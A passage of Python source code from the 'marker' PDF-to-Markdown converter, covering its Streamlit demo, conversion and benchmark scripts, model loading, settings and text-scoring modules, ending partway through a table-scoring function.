6534333c6a53e023152d85d76d28563977c6ccfc
File: marker_app.py import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" os.environ["IN_STREAMLIT"] = "true" import base64 import io import re import tempfile from typing import List, Any, Dict import pypdfium2 import streamlit as st from marker.convert import convert_single_pdf from marker.models import load_all_models from surya.languages import CODE_TO_LANGUAGE @st.cache_resource() def load_models(): return load_all_models() def convert_pdf(fname: str, langs: List[str] | None, max_pages: int | None, ocr_all_pages: bool) -> (str, Dict[str, Any], dict): full_text, images, out_meta = convert_single_pdf(fname, model_lst, max_pages=max_pages, langs=langs, ocr_all_pages=ocr_all_pages) return full_text, images, out_meta def open_pdf(pdf_file): stream = io.BytesIO(pdf_file.getvalue()) return pypdfium2.PdfDocument(stream) def img_to_html(img, img_alt): img_bytes = io.BytesIO() img.save(img_bytes, format="PNG") img_bytes = img_bytes.getvalue() encoded = base64.b64encode(img_bytes).decode() img_html = f'<img src="data:image/png;base64,{encoded}" alt="{img_alt}" style="max-width: 100%;">' return img_html def markdown_insert_images(markdown, images): image_tags = re.findall(r'(!\[(?P<image_title>[^\]]+)\]\((?P<image_path>[^\)"\s]+)\s*([^\)]*)\))', markdown) for image in image_tags: image_markdown = image[0] image_alt = image[1] image_path = image[2] if image_path in images: markdown = markdown.replace(image_markdown, img_to_html(images[image_path], image_alt)) return markdown @st.cache_data() def get_page_image(pdf_file, page_num, dpi=96): doc = open_pdf(pdf_file) renderer = doc.render( pypdfium2.PdfBitmap.to_pil, page_indices=[page_num - 1], scale=dpi / 72, ) png = list(renderer)[0] png_image = png.convert("RGB") return png_image @st.cache_data() def page_count(pdf_file): doc = open_pdf(pdf_file) return len(doc) st.set_page_config(layout="wide") col1, col2 = st.columns([.5, .5]) model_lst = load_models() st.markdown(""" # Marker Demo This app will let you try marker, a PDF -> Markdown converter. It works with any languages, and extracts images, tables, equations, etc. Find the project [here](https://github.com/VikParuchuri/marker). """) in_file = st.sidebar.file_uploader("PDF file:", type=["pdf"]) languages = st.sidebar.multiselect("Languages", sorted(list(CODE_TO_LANGUAGE.values())), default=[], max_selections=4, help="Select the languages in the pdf (if known) to improve OCR accuracy. 
Optional.") max_pages = st.sidebar.number_input("Max pages to parse", min_value=1, value=10, help="Optional maximum number of pages to convert") ocr_all_pages = st.sidebar.checkbox("Force OCR on all pages", help="Force OCR on all pages, even if they are images", value=False) if in_file is None: st.stop() filetype = in_file.type with col1: page_count = page_count(in_file) page_number = st.number_input(f"Page number out of {page_count}:", min_value=1, value=1, max_value=page_count) pil_image = get_page_image(in_file, page_number) st.image(pil_image, caption="PDF file (preview)", use_column_width=True) run_marker = st.sidebar.button("Run Marker") if not run_marker: st.stop() # Run Marker with tempfile.NamedTemporaryFile(suffix=".pdf") as temp_pdf: temp_pdf.write(in_file.getvalue()) temp_pdf.seek(0) filename = temp_pdf.name md_text, images, out_meta = convert_pdf(filename, languages, max_pages, ocr_all_pages) md_text = markdown_insert_images(md_text, images) with col2: st.markdown(md_text, unsafe_allow_html=True) File: run_marker_app.py import argparse import subprocess import os def run_app(): cur_dir = os.path.dirname(os.path.abspath(__file__)) app_path = os.path.join(cur_dir, "marker_app.py") cmd = ["streamlit", "run", app_path] subprocess.run(cmd, env={**os.environ, "IN_STREAMLIT": "true"}) if __name__ == "__main__": run_app() File: convert.py import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS os.environ["IN_STREAMLIT"] = "true" # Avoid multiprocessing inside surya os.environ["PDFTEXT_CPU_WORKERS"] = "1" # Avoid multiprocessing inside pdftext import pypdfium2 # Needs to be at the top to avoid warnings import argparse import torch.multiprocessing as mp from tqdm import tqdm import math from marker.convert import convert_single_pdf from marker.output import markdown_exists, save_markdown from marker.pdf.utils import find_filetype from marker.pdf.extract_text import get_length_of_text from marker.models import load_all_models from marker.settings import settings from marker.logger import configure_logging import traceback import json configure_logging() def worker_init(shared_model): if shared_model is None: shared_model = load_all_models() global model_refs model_refs = shared_model def worker_exit(): global model_refs del model_refs def process_single_pdf(args): filepath, out_folder, metadata, min_length = args fname = os.path.basename(filepath) if markdown_exists(out_folder, fname): return try: # Skip trying to convert files that don't have a lot of embedded text # This can indicate that they were scanned, and not OCRed properly # Usually these files are not recent/high-quality if min_length: filetype = find_filetype(filepath) if filetype == "other": return 0 length = get_length_of_text(filepath) if length < min_length: return full_text, images, out_metadata = convert_single_pdf(filepath, model_refs, metadata=metadata) if len(full_text.strip()) > 0: save_markdown(out_folder, fname, full_text, images, out_metadata) else: print(f"Empty file: {filepath}. 
Could not convert.") except Exception as e: print(f"Error converting {filepath}: {e}") print(traceback.format_exc()) def main(): parser = argparse.ArgumentParser(description="Convert multiple pdfs to markdown.") parser.add_argument("in_folder", help="Input folder with pdfs.") parser.add_argument("out_folder", help="Output folder") parser.add_argument("--chunk_idx", type=int, default=0, help="Chunk index to convert") parser.add_argument("--num_chunks", type=int, default=1, help="Number of chunks being processed in parallel") parser.add_argument("--max", type=int, default=None, help="Maximum number of pdfs to convert") parser.add_argument("--workers", type=int, default=5, help="Number of worker processes to use. Peak VRAM usage per process is 5GB, but avg is closer to 3.5GB.") parser.add_argument("--metadata_file", type=str, default=None, help="Metadata json file to use for languages") parser.add_argument("--min_length", type=int, default=None, help="Minimum length of pdf to convert") args = parser.parse_args() in_folder = os.path.abspath(args.in_folder) out_folder = os.path.abspath(args.out_folder) files = [os.path.join(in_folder, f) for f in os.listdir(in_folder)] files = [f for f in files if os.path.isfile(f)] os.makedirs(out_folder, exist_ok=True) # Handle chunks if we're processing in parallel # Ensure we get all files into a chunk chunk_size = math.ceil(len(files) / args.num_chunks) start_idx = args.chunk_idx * chunk_size end_idx = start_idx + chunk_size files_to_convert = files[start_idx:end_idx] # Limit files converted if needed if args.max: files_to_convert = files_to_convert[:args.max] metadata = {} if args.metadata_file: metadata_file = os.path.abspath(args.metadata_file) with open(metadata_file, "r") as f: metadata = json.load(f) total_processes = min(len(files_to_convert), args.workers) try: mp.set_start_method('spawn') # Required for CUDA, forkserver doesn't work except RuntimeError: raise RuntimeError("Set start method to spawn twice. This may be a temporary issue with the script. Please try running it again.") if settings.TORCH_DEVICE == "mps" or settings.TORCH_DEVICE_MODEL == "mps": print("Cannot use MPS with torch multiprocessing share_memory. This will make things less memory efficient. If you want to share memory, you have to use CUDA or CPU. 
Set the TORCH_DEVICE environment variable to change the device.") model_lst = None else: model_lst = load_all_models() for model in model_lst: if model is None: continue model.share_memory() print(f"Converting {len(files_to_convert)} pdfs in chunk {args.chunk_idx + 1}/{args.num_chunks} with {total_processes} processes, and storing in {out_folder}") task_args = [(f, out_folder, metadata.get(os.path.basename(f)), args.min_length) for f in files_to_convert] with mp.Pool(processes=total_processes, initializer=worker_init, initargs=(model_lst,)) as pool: list(tqdm(pool.imap(process_single_pdf, task_args), total=len(task_args), desc="Processing PDFs", unit="pdf")) pool._worker_handler.terminate = worker_exit # Delete all CUDA tensors del model_lst if __name__ == "__main__": main() File: chunk_convert.py import argparse import subprocess import pkg_resources def main(): parser = argparse.ArgumentParser(description="Convert a folder of PDFs to a folder of markdown files in chunks.") parser.add_argument("in_folder", help="Input folder with pdfs.") parser.add_argument("out_folder", help="Output folder") args = parser.parse_args() script_path = pkg_resources.resource_filename(__name__, 'chunk_convert.sh') # Construct the command cmd = f"{script_path} {args.in_folder} {args.out_folder}" # Execute the shell script subprocess.run(cmd, shell=True, check=True) if __name__ == "__main__": main() File: convert_single.py import time import pypdfium2 # Needs to be at the top to avoid warnings import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS import argparse from marker.convert import convert_single_pdf from marker.logger import configure_logging from marker.models import load_all_models from marker.output import save_markdown configure_logging() def main(): parser = argparse.ArgumentParser() parser.add_argument("filename", help="PDF file to parse") parser.add_argument("output", help="Output base folder path") parser.add_argument("--max_pages", type=int, default=None, help="Maximum number of pages to parse") parser.add_argument("--start_page", type=int, default=None, help="Page to start processing at") parser.add_argument("--langs", type=str, help="Optional languages to use for OCR, comma separated", default=None) parser.add_argument("--batch_multiplier", type=int, default=2, help="How much to increase batch sizes") parser.add_argument("--debug", action="store_true", help="Enable debug logging", default=False) parser.add_argument("--ocr_all_pages", action="store_true", help="Force OCR on all pages", default=False) args = parser.parse_args() langs = args.langs.split(",") if args.langs else None fname = args.filename model_lst = load_all_models() start = time.time() full_text, images, out_meta = convert_single_pdf(fname, model_lst, max_pages=args.max_pages, langs=langs, batch_multiplier=args.batch_multiplier, start_page=args.start_page, ocr_all_pages=args.ocr_all_pages) fname = os.path.basename(fname) subfolder_path = save_markdown(args.output, fname, full_text, images, out_meta) print(f"Saved markdown to the {subfolder_path} folder") if args.debug: print(f"Total time: {time.time() - start}") if __name__ == "__main__": main() File: benchmarks/overall.py import argparse import tempfile import time from collections import defaultdict from tqdm import tqdm import pypdfium2 as pdfium from marker.convert import convert_single_pdf from marker.logger import configure_logging from marker.models import 
load_all_models
from marker.benchmark.scoring import score_text
from marker.pdf.extract_text import naive_get_text
import json
import logging
import os
import subprocess
import shutil
from tabulate import tabulate
import torch

configure_logging()
logger = logging.getLogger(__name__)  # `logger` is used in stop_memory_profiling below


def start_memory_profiling():
    torch.cuda.memory._record_memory_history(
        max_entries=100000
    )


def stop_memory_profiling(memory_file):
    try:
        torch.cuda.memory._dump_snapshot(memory_file)
    except Exception as e:
        logger.error(f"Failed to capture memory snapshot {e}")

    # Stop recording memory snapshot history.
    torch.cuda.memory._record_memory_history(enabled=None)


def nougat_prediction(pdf_filename, batch_size=1):
    out_dir = tempfile.mkdtemp()
    subprocess.run(["nougat", pdf_filename, "-o", out_dir, "--no-skipping", "--recompute", "--batchsize", str(batch_size)], check=True)
    md_file = os.listdir(out_dir)[0]
    with open(os.path.join(out_dir, md_file), "r") as f:
        data = f.read()
    shutil.rmtree(out_dir)
    return data


def main():
    parser = argparse.ArgumentParser(description="Benchmark PDF to MD conversion. Needs source pdfs, and a reference folder with the correct markdown.")
    parser.add_argument("in_folder", help="Input PDF files")
    parser.add_argument("reference_folder", help="Reference folder with reference markdown files")
    parser.add_argument("out_file", help="Output filename")
    parser.add_argument("--nougat", action="store_true", help="Run nougat and compare", default=False)
    # Nougat batch size 1 uses about as much VRAM as default marker settings
    parser.add_argument("--marker_batch_multiplier", type=int, default=1, help="Batch size multiplier to use for marker when making predictions.")
    parser.add_argument("--nougat_batch_size", type=int, default=1, help="Batch size to use for nougat when making predictions.")
    parser.add_argument("--md_out_path", type=str, default=None, help="Output path for generated markdown files")
    parser.add_argument("--profile_memory", action="store_true", help="Profile memory usage", default=False)

    args = parser.parse_args()

    methods = ["marker"]
    if args.nougat:
        methods.append("nougat")

    if args.profile_memory:
        start_memory_profiling()
    model_lst = load_all_models()
    if args.profile_memory:
        stop_memory_profiling("model_load.pickle")

    scores = defaultdict(dict)
    benchmark_files = os.listdir(args.in_folder)
    benchmark_files = [b for b in benchmark_files if b.endswith(".pdf")]
    times = defaultdict(dict)
    pages = defaultdict(int)

    for idx, fname in tqdm(enumerate(benchmark_files)):
        md_filename = fname.rsplit(".", 1)[0] + ".md"
        reference_filename = os.path.join(args.reference_folder, md_filename)
        with open(reference_filename, "r", encoding="utf-8") as f:
            reference = f.read()

        pdf_filename = os.path.join(args.in_folder, fname)
        doc = pdfium.PdfDocument(pdf_filename)
        pages[fname] = len(doc)

        for method in methods:
            start = time.time()
            if method == "marker":
                if args.profile_memory:
                    start_memory_profiling()
                full_text, _, out_meta = convert_single_pdf(pdf_filename, model_lst, batch_multiplier=args.marker_batch_multiplier)
                if args.profile_memory:
                    stop_memory_profiling(f"marker_memory_{idx}.pickle")
            elif method == "nougat":
                full_text = nougat_prediction(pdf_filename, batch_size=args.nougat_batch_size)
            elif method == "naive":
                full_text = naive_get_text(doc)
            else:
                raise ValueError(f"Unknown method {method}")

            times[method][fname] = time.time() - start

            score = score_text(full_text, reference)
            scores[method][fname] = score

            if args.md_out_path:
                md_out_filename = f"{method}_{md_filename}"
                with open(os.path.join(args.md_out_path, md_out_filename), "w+") as f:
                    f.write(full_text)

    total_pages
= sum(pages.values()) with open(args.out_file, "w+") as f: write_data = defaultdict(dict) for method in methods: total_time = sum(times[method].values()) file_stats = { fname: { "time": times[method][fname], "score": scores[method][fname], "pages": pages[fname] } for fname in benchmark_files } write_data[method] = { "files": file_stats, "avg_score": sum(scores[method].values()) / len(scores[method]), "time_per_page": total_time / total_pages, "time_per_doc": total_time / len(scores[method]) } json.dump(write_data, f, indent=4) summary_table = [] score_table = [] score_headers = benchmark_files for method in methods: summary_table.append([method, write_data[method]["avg_score"], write_data[method]["time_per_page"], write_data[method]["time_per_doc"]]) score_table.append([method, *[write_data[method]["files"][h]["score"] for h in score_headers]]) print(tabulate(summary_table, headers=["Method", "Average Score", "Time per page", "Time per document"])) print("") print("Scores by file") print(tabulate(score_table, headers=["Method", *score_headers])) if __name__ == "__main__": main() File: benchmarks/table.py import argparse import json import datasets from surya.schema import LayoutResult, LayoutBox from tqdm import tqdm from marker.benchmark.table import score_table from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.tables.table import format_tables def main(): parser = argparse.ArgumentParser(description="Benchmark table conversion.") parser.add_argument("out_file", help="Output filename for results") parser.add_argument("--dataset", type=str, help="Dataset to use", default="vikp/table_bench") args = parser.parse_args() ds = datasets.load_dataset(args.dataset, split="train") results = [] for i in tqdm(range(len(ds)), desc="Evaluating tables"): row = ds[i] marker_page = Page(**json.loads(row["marker_page"])) table_bbox = row["table_bbox"] gpt4_table = json.loads(row["gpt_4_table"])["markdown_table"] # Counterclockwise polygon from top left table_poly = [ [table_bbox[0], table_bbox[1]], [table_bbox[2], table_bbox[1]], [table_bbox[2], table_bbox[3]], [table_bbox[0], table_bbox[3]], ] # Remove all other tables from the layout results layout_result = LayoutResult( bboxes=[ LayoutBox( label="Table", polygon=table_poly ) ], segmentation_map="", image_bbox=marker_page.text_lines.image_bbox ) marker_page.layout = layout_result format_tables([marker_page]) table_blocks = [block for block in marker_page.blocks if block.block_type == "Table"] if len(table_blocks) != 1: continue table_block = table_blocks[0] table_md = table_block.lines[0].spans[0].text results.append({ "score": score_table(table_md, gpt4_table), "arxiv_id": row["arxiv_id"], "page_idx": row["page_idx"], "marker_table": table_md, "gpt4_table": gpt4_table, "table_bbox": table_bbox }) avg_score = sum([r["score"] for r in results]) / len(results) print(f"Evaluated {len(results)} tables, average score is {avg_score}.") with open(args.out_file, "w+") as f: json.dump(results, f, indent=2) if __name__ == "__main__": main() File: scripts/verify_benchmark_scores.py import json import argparse def verify_scores(file_path): with open(file_path, 'r') as file: data = json.load(file) multicolcnn_score = data["marker"]["files"]["multicolcnn.pdf"]["score"] switch_trans_score = data["marker"]["files"]["switch_trans.pdf"]["score"] if multicolcnn_score <= 0.37 or switch_trans_score <= 0.4: raise ValueError("One or more scores are below the required threshold of 0.4") def verify_table_scores(file_path): with 
open(file_path, 'r') as file: data = json.load(file) avg = sum([r["score"] for r in data]) / len(data) if avg < 0.7: raise ValueError("Average score is below the required threshold of 0.7") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Verify benchmark scores") parser.add_argument("file_path", type=str, help="Path to the json file") parser.add_argument("--type", type=str, help="Type of file to verify", default="marker") args = parser.parse_args() if args.type == "marker": verify_scores(args.file_path) elif args.type == "table": verify_table_scores(args.file_path) File: marker/models.py import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS from marker.postprocessors.editor import load_editing_model from surya.model.detection.model import load_model as load_detection_model, load_processor as load_detection_processor from texify.model.model import load_model as load_texify_model from texify.model.processor import load_processor as load_texify_processor from marker.settings import settings from surya.model.recognition.model import load_model as load_recognition_model from surya.model.recognition.processor import load_processor as load_recognition_processor from surya.model.ordering.model import load_model as load_order_model from surya.model.ordering.processor import load_processor as load_order_processor def setup_recognition_model(device=None, dtype=None): if device: rec_model = load_recognition_model(device=device, dtype=dtype) else: rec_model = load_recognition_model() rec_processor = load_recognition_processor() rec_model.processor = rec_processor return rec_model def setup_detection_model(device=None, dtype=None): if device: model = load_detection_model(device=device, dtype=dtype) else: model = load_detection_model() processor = load_detection_processor() model.processor = processor return model def setup_texify_model(device=None, dtype=None): if device: texify_model = load_texify_model(checkpoint=settings.TEXIFY_MODEL_NAME, device=device, dtype=dtype) else: texify_model = load_texify_model(checkpoint=settings.TEXIFY_MODEL_NAME, device=settings.TORCH_DEVICE_MODEL, dtype=settings.TEXIFY_DTYPE) texify_processor = load_texify_processor() texify_model.processor = texify_processor return texify_model def setup_layout_model(device=None, dtype=None): if device: model = load_detection_model(checkpoint=settings.LAYOUT_MODEL_CHECKPOINT, device=device, dtype=dtype) else: model = load_detection_model(checkpoint=settings.LAYOUT_MODEL_CHECKPOINT) processor = load_detection_processor(checkpoint=settings.LAYOUT_MODEL_CHECKPOINT) model.processor = processor return model def setup_order_model(device=None, dtype=None): if device: model = load_order_model(device=device, dtype=dtype) else: model = load_order_model() processor = load_order_processor() model.processor = processor return model def load_all_models(device=None, dtype=None, force_load_ocr=False): if device is not None: assert dtype is not None, "Must provide dtype if device is provided" # langs is optional list of languages to prune from recognition MoE model detection = setup_detection_model(device, dtype) layout = setup_layout_model(device, dtype) order = setup_order_model(device, dtype) edit = load_editing_model(device, dtype) # Only load recognition model if we'll need it for all pdfs ocr = setup_recognition_model(device, dtype) texify = setup_texify_model(device, dtype) model_lst = [texify, layout, order, edit, 
detection, ocr] return model_lst File: marker/convert.py import warnings warnings.filterwarnings("ignore", category=UserWarning) # Filter torch pytree user warnings import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS import pypdfium2 as pdfium # Needs to be at the top to avoid warnings from PIL import Image from marker.utils import flush_cuda_memory from marker.tables.table import format_tables from marker.debug.data import dump_bbox_debug_data from marker.layout.layout import surya_layout, annotate_block_types from marker.layout.order import surya_order, sort_blocks_in_reading_order from marker.ocr.lang import replace_langs_with_codes, validate_langs from marker.ocr.detection import surya_detection from marker.ocr.recognition import run_ocr from marker.pdf.extract_text import get_text_blocks from marker.cleaners.headers import filter_header_footer, filter_common_titles from marker.equations.equations import replace_equations from marker.pdf.utils import find_filetype from marker.postprocessors.editor import edit_full_text from marker.cleaners.code import identify_code_blocks, indent_blocks from marker.cleaners.bullets import replace_bullets from marker.cleaners.headings import split_heading_blocks from marker.cleaners.fontstyle import find_bold_italic from marker.postprocessors.markdown import merge_spans, merge_lines, get_full_text from marker.cleaners.text import cleanup_text from marker.images.extract import extract_images from marker.images.save import images_to_dict from typing import List, Dict, Tuple, Optional from marker.settings import settings def convert_single_pdf( fname: str, model_lst: List, max_pages: int = None, start_page: int = None, metadata: Optional[Dict] = None, langs: Optional[List[str]] = None, batch_multiplier: int = 1, ocr_all_pages: bool = False ) -> Tuple[str, Dict[str, Image.Image], Dict]: ocr_all_pages = ocr_all_pages or settings.OCR_ALL_PAGES if metadata: langs = metadata.get("languages", langs) langs = replace_langs_with_codes(langs) validate_langs(langs) # Find the filetype filetype = find_filetype(fname) # Setup output metadata out_meta = { "languages": langs, "filetype": filetype, } if filetype == "other": # We can't process this file return "", {}, out_meta # Get initial text blocks from the pdf doc = pdfium.PdfDocument(fname) pages, toc = get_text_blocks( doc, fname, max_pages=max_pages, start_page=start_page ) out_meta.update({ "toc": toc, "pages": len(pages), }) # Trim pages from doc to align with start page if start_page: for page_idx in range(start_page): doc.del_page(0) # Unpack models from list texify_model, layout_model, order_model, edit_model, detection_model, ocr_model = model_lst # Identify text lines on pages surya_detection(doc, pages, detection_model, batch_multiplier=batch_multiplier) flush_cuda_memory() # OCR pages as needed pages, ocr_stats = run_ocr(doc, pages, langs, ocr_model, batch_multiplier=batch_multiplier, ocr_all_pages=ocr_all_pages) flush_cuda_memory() out_meta["ocr_stats"] = ocr_stats if len([b for p in pages for b in p.blocks]) == 0: print(f"Could not extract any text blocks for {fname}") return "", {}, out_meta surya_layout(doc, pages, layout_model, batch_multiplier=batch_multiplier) flush_cuda_memory() # Find headers and footers bad_span_ids = filter_header_footer(pages) out_meta["block_stats"] = {"header_footer": len(bad_span_ids)} # Add block types in annotate_block_types(pages) # Dump debug data if flags are set 
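    # (Editor's note, added) "Flags" here presumably refers to the debug settings in
    # marker/settings.py (DEBUG, DEBUG_DATA_FOLDER, DEBUG_LEVEL); dump_bbox_debug_data
    # is expected to be a no-op unless they are configured.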
dump_bbox_debug_data(doc, fname, pages) # Find reading order for blocks # Sort blocks by reading order surya_order(doc, pages, order_model, batch_multiplier=batch_multiplier) sort_blocks_in_reading_order(pages) flush_cuda_memory() # Fix code blocks code_block_count = identify_code_blocks(pages) out_meta["block_stats"]["code"] = code_block_count indent_blocks(pages) # Fix table blocks table_count = format_tables(pages) out_meta["block_stats"]["table"] = table_count for page in pages: for block in page.blocks: block.filter_spans(bad_span_ids) block.filter_bad_span_types() filtered, eq_stats = replace_equations( doc, pages, texify_model, batch_multiplier=batch_multiplier ) flush_cuda_memory() out_meta["block_stats"]["equations"] = eq_stats # Extract images and figures if settings.EXTRACT_IMAGES: extract_images(doc, pages) # Split out headers split_heading_blocks(pages) find_bold_italic(pages) # Copy to avoid changing original data merged_lines = merge_spans(filtered) text_blocks = merge_lines(merged_lines) text_blocks = filter_common_titles(text_blocks) full_text = get_full_text(text_blocks) # Handle empty blocks being joined full_text = cleanup_text(full_text) # Replace bullet characters with a - full_text = replace_bullets(full_text) # Postprocess text with editor model full_text, edit_stats = edit_full_text( full_text, edit_model, batch_multiplier=batch_multiplier ) flush_cuda_memory() out_meta["postprocess_stats"] = {"edit": edit_stats} doc_images = images_to_dict(pages) return full_text, doc_images, out_meta File: marker/logger.py import logging import warnings def configure_logging(): logging.basicConfig(level=logging.WARNING) logging.getLogger('pdfminer').setLevel(logging.ERROR) logging.getLogger('PIL').setLevel(logging.ERROR) logging.getLogger('fitz').setLevel(logging.ERROR) logging.getLogger('ocrmypdf').setLevel(logging.ERROR) warnings.simplefilter(action='ignore', category=FutureWarning) File: marker/utils.py import torch from marker.settings import settings def flush_cuda_memory(): if settings.TORCH_DEVICE_MODEL == "cuda": torch.cuda.empty_cache() File: marker/settings.py from typing import Optional, List, Dict, Literal from dotenv import find_dotenv from pydantic import computed_field from pydantic_settings import BaseSettings import torch class Settings(BaseSettings): # General TORCH_DEVICE: Optional[str] = None # Note: MPS device does not work for text detection, and will default to CPU IMAGE_DPI: int = 96 # DPI to render images pulled from pdf at EXTRACT_IMAGES: bool = True # Extract images from pdfs and save them PAGINATE_OUTPUT: bool = False # Paginate output markdown @computed_field @property def TORCH_DEVICE_MODEL(self) -> str: if self.TORCH_DEVICE is not None: return self.TORCH_DEVICE if torch.cuda.is_available(): return "cuda" if torch.backends.mps.is_available(): return "mps" return "cpu" DEFAULT_LANG: str = "English" # Default language we assume files to be in, should be one of the keys in TESSERACT_LANGUAGES SUPPORTED_FILETYPES: Dict = { "application/pdf": "pdf", } # Text extraction PDFTEXT_CPU_WORKERS: int = 4 # How many CPU workers to use for pdf text extraction # Text line Detection DETECTOR_BATCH_SIZE: Optional[int] = None # Defaults to 6 for CPU, 12 otherwise SURYA_DETECTOR_DPI: int = 96 DETECTOR_POSTPROCESSING_CPU_WORKERS: int = 4 # OCR INVALID_CHARS: List[str] = [chr(0xfffd), "�"] OCR_ENGINE: Optional[Literal["surya", "ocrmypdf"]] = "surya" # Which OCR engine to use, either "surya" or "ocrmypdf". Defaults to "ocrmypdf" on CPU, "surya" on GPU. 
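    # (Editor's note, hedged sketch) The fields in this Settings class are
    # pydantic-settings fields, so each one can be overridden through environment
    # variables or the local.env file referenced by the Config class at the bottom of
    # this module. For example (paper.pdf is a hypothetical input file):
    #
    #     OCR_ENGINE=ocrmypdf TORCH_DEVICE=cpu python convert_single.py paper.pdf out/
    #
    # or, from Python:
    #
    #     from marker.settings import settings
    #     print(settings.OCR_ENGINE, settings.TORCH_DEVICE_MODEL)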
OCR_ALL_PAGES: bool = False # Run OCR on every page even if text can be extracted ## Surya SURYA_OCR_DPI: int = 96 RECOGNITION_BATCH_SIZE: Optional[int] = None # Batch size for surya OCR defaults to 64 for cuda, 32 otherwise ## Tesseract OCR_PARALLEL_WORKERS: int = 2 # How many CPU workers to use for OCR TESSERACT_TIMEOUT: int = 20 # When to give up on OCR TESSDATA_PREFIX: str = "" # Texify model TEXIFY_MODEL_MAX: int = 384 # Max inference length for texify TEXIFY_TOKEN_BUFFER: int = 256 # Number of tokens to buffer above max for texify TEXIFY_DPI: int = 96 # DPI to render images at TEXIFY_BATCH_SIZE: Optional[int] = None # Defaults to 6 for cuda, 12 otherwise TEXIFY_MODEL_NAME: str = "vikp/texify" # Layout model SURYA_LAYOUT_DPI: int = 96 BAD_SPAN_TYPES: List[str] = ["Page-footer", "Page-header", "Picture"] # You can add "Caption" and "Footnote" here to get rid of those elements LAYOUT_MODEL_CHECKPOINT: str = "vikp/surya_layout3" BBOX_INTERSECTION_THRESH: float = 0.7 # How much the layout and pdf bboxes need to overlap to be the same TABLE_INTERSECTION_THRESH: float = 0.7 LAYOUT_BATCH_SIZE: Optional[int] = None # Defaults to 12 for cuda, 6 otherwise # Ordering model SURYA_ORDER_DPI: int = 96 ORDER_BATCH_SIZE: Optional[int] = None # Defaults to 12 for cuda, 6 otherwise ORDER_MAX_BBOXES: int = 255 # Final editing model EDITOR_BATCH_SIZE: Optional[int] = None # Defaults to 6 for cuda, 12 otherwise EDITOR_MAX_LENGTH: int = 1024 EDITOR_MODEL_NAME: str = "vikp/pdf_postprocessor_t5" ENABLE_EDITOR_MODEL: bool = False # The editor model can create false positives EDITOR_CUTOFF_THRESH: float = 0.9 # Ignore predictions below this probability # Debug DEBUG: bool = False # Enable debug logging DEBUG_DATA_FOLDER: Optional[str] = None DEBUG_LEVEL: int = 0 # 0 to 2, 2 means log everything @computed_field @property def CUDA(self) -> bool: return "cuda" in self.TORCH_DEVICE_MODEL @computed_field @property def MODEL_DTYPE(self) -> torch.dtype: if self.TORCH_DEVICE_MODEL == "cuda": return torch.bfloat16 else: return torch.float32 @computed_field @property def TEXIFY_DTYPE(self) -> torch.dtype: return torch.float32 if self.TORCH_DEVICE_MODEL == "cpu" else torch.float16 class Config: env_file = find_dotenv("local.env") extra = "ignore" settings = Settings() File: marker/output.py import os import json def get_subfolder_path(out_folder, fname): subfolder_name = fname.rsplit('.', 1)[0] subfolder_path = os.path.join(out_folder, subfolder_name) return subfolder_path def get_markdown_filepath(out_folder, fname): subfolder_path = get_subfolder_path(out_folder, fname) out_filename = fname.rsplit(".", 1)[0] + ".md" out_filename = os.path.join(subfolder_path, out_filename) return out_filename def markdown_exists(out_folder, fname): out_filename = get_markdown_filepath(out_folder, fname) return os.path.exists(out_filename) def save_markdown(out_folder, fname, full_text, images, out_metadata): subfolder_path = get_subfolder_path(out_folder, fname) os.makedirs(subfolder_path, exist_ok=True) markdown_filepath = get_markdown_filepath(out_folder, fname) out_meta_filepath = markdown_filepath.rsplit(".", 1)[0] + "_meta.json" with open(markdown_filepath, "w+", encoding='utf-8') as f: f.write(full_text) with open(out_meta_filepath, "w+") as f: f.write(json.dumps(out_metadata, indent=4)) for filename, image in images.items(): image_filepath = os.path.join(subfolder_path, filename) image.save(image_filepath, "PNG") return subfolder_path File: marker/benchmark/scoring.py import math from rapidfuzz import fuzz import re import regex 
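# (Editor's sketch, not part of the original module) score_text below chunks the
# hypothesis and reference into ~500-character pieces, fuzzy-matches each hypothesis
# chunk against nearby reference chunks with rapidfuzz, and averages the best
# per-chunk ratios into a 0-1 alignment score. A minimal smoke test, assuming this
# module is importable as marker.benchmark.scoring; the helper name is hypothetical
# and safe to delete:
def _score_text_smoke_test():
    # Identical long strings should score close to 1.0.
    sample = "Marker converts PDF pages into markdown text blocks. " * 20
    identical = score_text(sample, sample)
    assert identical > 0.99
    return identical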
from statistics import mean CHUNK_MIN_CHARS = 25 def chunk_text(text, chunk_len=500): chunks = [text[i:i+chunk_len] for i in range(0, len(text), chunk_len)] chunks = [c for c in chunks if c.strip() and len(c) > CHUNK_MIN_CHARS] return chunks def overlap_score(hypothesis_chunks, reference_chunks): length_modifier = len(hypothesis_chunks) / len(reference_chunks) search_distance = max(len(reference_chunks) // 5, 10) chunk_scores = [] for i, hyp_chunk in enumerate(hypothesis_chunks): max_score = 0 total_len = 0 i_offset = int(i * length_modifier) chunk_range = range(max(0, i_offset-search_distance), min(len(reference_chunks), i_offset+search_distance)) for j in chunk_range: ref_chunk = reference_chunks[j] score = fuzz.ratio(hyp_chunk, ref_chunk, score_cutoff=30) / 100 if score > max_score: max_score = score total_len = len(ref_chunk) chunk_scores.append(max_score) return chunk_scores def score_text(hypothesis, reference): # Returns a 0-1 alignment score hypothesis_chunks = chunk_text(hypothesis) reference_chunks = chunk_text(reference) chunk_scores = overlap_score(hypothesis_chunks, reference_chunks) return mean(chunk_scores) File: marker/benchmark/table.py from rapidfuzz import fuzz import re def split_to_cells(table): table = table.strip() table = re.sub(r" {2,}", "", table) table_rows = table.split("\n") table_rows = [t for t in table_rows if t.strip()] table_cells = [r.split("|") for r in table_rows] return table_cells def align_rows(hypothesis, ref_row): best_alignment = [] best_alignment_score = 0 for j in range(0, len(hypothesis)): alignments = [] for i in range(len(ref_row)): if i >= len(hypothesis[j]): alignments.append(0) continue alignment = fuzz.ratio(hypothesis[j][i], ref_row[i], score_cutoff=30) / 100 alignments.append(alignment) if len(alignments) == 0: continue alignment_score = sum(alignments) / len(alignments) if alignment_score >= best_alignment_score: best_alignment = alignments best_alignment_score = alignment_score return 